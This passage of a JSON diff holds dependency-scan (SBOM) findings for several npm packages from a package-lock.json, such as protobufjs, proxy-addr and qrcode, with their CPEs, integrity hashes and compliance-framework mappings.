"/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:process-nextick-args:process-nextick-args:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:process-nextick-args:process_nextick_args:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:process_nextick_args:process-nextick-args:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:process_nextick_args:process_nextick_args:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:process-nextick:process-nextick-args:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:process-nextick:process_nextick_args:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:process_nextick:process-nextick-args:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:process_nextick:process_nextick_args:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:process:process-nextick-args:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:process:process_nextick_args:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/process-nextick-args@2.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", + "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b351d49072943449", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: prop-types 15.8.1", + "title": "prop-types 15.8.1", + "description": "Package discovered: prop-types 15.8.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "2485766b0114da33", + "name": "prop-types", + "version": "15.8.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:prop-types:prop-types:15.8.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:prop-types:prop_types:15.8.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:prop_types:prop-types:15.8.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:prop_types:prop_types:15.8.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:prop:prop-types:15.8.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:prop:prop_types:15.8.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/prop-types@15.8.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/prop-types/-/prop-types-15.8.1.tgz", + "integrity": "sha512-oj87CgZICdulUohogVAR7AjlC0327U4el4L6eAvOqCeudMDVU0NThNaV+b9Df4dXgSP1gXMTnPdhfe/2qDH5cg==", + "dependencies": { + "loose-envify": "^1.4.0", + "object-assign": "^4.1.1", + "react-is": "^16.13.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "acadb8b8517c78d3", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: proto-list 1.2.4", + "title": "proto-list 1.2.4", + "description": "Package discovered: proto-list 1.2.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "685c0e3e50c6553a", + "name": "proto-list", + "version": "1.2.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:proto-list:proto-list:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proto-list:proto_list:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proto_list:proto-list:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proto_list:proto_list:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proto:proto-list:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proto:proto_list:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/proto-list@1.2.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/proto-list/-/proto-list-1.2.4.tgz", + "integrity": "sha512-vtK/94akxsTMhe0/cbfpR+syPuszcuwhqVjJq26CuNDgFGj682oRBXOP5MJpv2r7JtE8MsiepGIqvvOTBwn2vA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "44c7a82b0c4aafcf", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: proto3-json-serializer 2.0.2", + "title": "proto3-json-serializer 2.0.2", + "description": "Package discovered: proto3-json-serializer 2.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "5add12638aea166c", + "name": "proto3-json-serializer", + "version": "2.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:proto3-json-serializer:proto3-json-serializer:2.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proto3-json-serializer:proto3_json_serializer:2.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proto3_json_serializer:proto3-json-serializer:2.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proto3_json_serializer:proto3_json_serializer:2.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proto3-json:proto3-json-serializer:2.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proto3-json:proto3_json_serializer:2.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proto3_json:proto3-json-serializer:2.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proto3_json:proto3_json_serializer:2.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proto3:proto3-json-serializer:2.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proto3:proto3_json_serializer:2.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/proto3-json-serializer@2.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/proto3-json-serializer/-/proto3-json-serializer-2.0.2.tgz", + "integrity": "sha512-SAzp/O4Yh02jGdRc+uIrGoe87dkN/XtwxfZ4ZyafJHymd79ozp5VG5nyZ7ygqPM5+cpLDjjGnYFUkngonyDPOQ==", + "dependencies": { + "protobufjs": "^7.2.5" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f337eadf0901e415", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: protobufjs 7.5.6", + "title": "protobufjs 7.5.6", + "description": "Package discovered: protobufjs 7.5.6", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "a5b5323abf9aae9f", + "name": "protobufjs", + "version": "7.5.6", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BSD-3-Clause", + "spdxExpression": "BSD-3-Clause", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:protobufjs_project:protobufjs:7.5.6:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/protobufjs@7.5.6", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/protobufjs/-/protobufjs-7.5.6.tgz", + "integrity": "sha512-M71sTMB146U3u0di3yup8iM+zv8yPRNQVr1KK4tyBitl3qFvEGucq/rGDRShD2rsJhtN02RJaJ7j5X5hmy8SJg==", + "dependencies": { + "@protobufjs/aspromise": "^1.1.2", + "@protobufjs/base64": "^1.1.2", + "@protobufjs/codegen": "^2.0.5", + "@protobufjs/eventemitter": "^1.1.0", + "@protobufjs/fetch": "^1.1.0", + "@protobufjs/float": "^1.0.2", + "@protobufjs/inquire": "^1.1.1", + "@protobufjs/path": "^1.1.2", + "@protobufjs/pool": "^1.1.0", + "@protobufjs/utf8": "^1.1.1", + "@types/node": ">=13.7.0", + "long": "^5.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d4455e8054d4e780", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: proxy-addr 2.0.7", + "title": "proxy-addr 2.0.7", + "description": "Package discovered: proxy-addr 2.0.7", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "ce10aea6db36304a", + "name": "proxy-addr", + "version": "2.0.7", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:proxy-addr:proxy-addr:2.0.7:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proxy-addr:proxy_addr:2.0.7:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proxy_addr:proxy-addr:2.0.7:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proxy_addr:proxy_addr:2.0.7:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proxy:proxy-addr:2.0.7:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proxy:proxy_addr:2.0.7:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/proxy-addr@2.0.7", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/proxy-addr/-/proxy-addr-2.0.7.tgz", + "integrity": "sha512-llQsMLSUDUPT44jdrU/O37qlnifitDP+ZwrmmZcoSKyLKvtZxpyV0n2/bD/N4tBAAZ/gJEdZU7KMraoK1+XYAg==", + "dependencies": { + "forwarded": "0.2.0", + "ipaddr.js": "1.9.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "4788b4003cbe678a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: proxy-from-env 2.1.0", + "title": "proxy-from-env 2.1.0", + "description": "Package discovered: proxy-from-env 2.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "d0670890e90b35a8", + "name": "proxy-from-env", + "version": "2.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:proxy-from-env:proxy-from-env:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proxy-from-env:proxy_from_env:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proxy_from_env:proxy-from-env:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proxy_from_env:proxy_from_env:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proxy-from:proxy-from-env:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proxy-from:proxy_from_env:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proxy_from:proxy-from-env:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proxy_from:proxy_from_env:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proxy:proxy-from-env:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:proxy:proxy_from_env:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/proxy-from-env@2.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-2.1.0.tgz", + "integrity": "sha512-cJ+oHTW1VAEa8cJslgmUZrc+sjRKgAKl3Zyse6+PV38hZe/V6Z14TbCuXcan9F9ghlz4QrFr2c92TNF82UkYHA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "6d2187ed4d7bb00d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: qrcode 1.5.4", + "title": "qrcode 1.5.4", + "description": "Package discovered: qrcode 1.5.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "9616afcfad81bbcd", + "name": "qrcode", + "version": "1.5.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:qrcode:qrcode:1.5.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/qrcode@1.5.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/qrcode/-/qrcode-1.5.4.tgz", + "integrity": "sha512-1ca71Zgiu6ORjHqFBDpnSMTR2ReToX4l1Au1VFLyVeBTFavzQnv5JxMFr3ukHVKpSrSA2MCk0lNJSykjUfz7Zg==", + "dependencies": { + "dijkstrajs": "^1.0.1", + "pngjs": "^5.0.0", + "yargs": "^15.3.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": 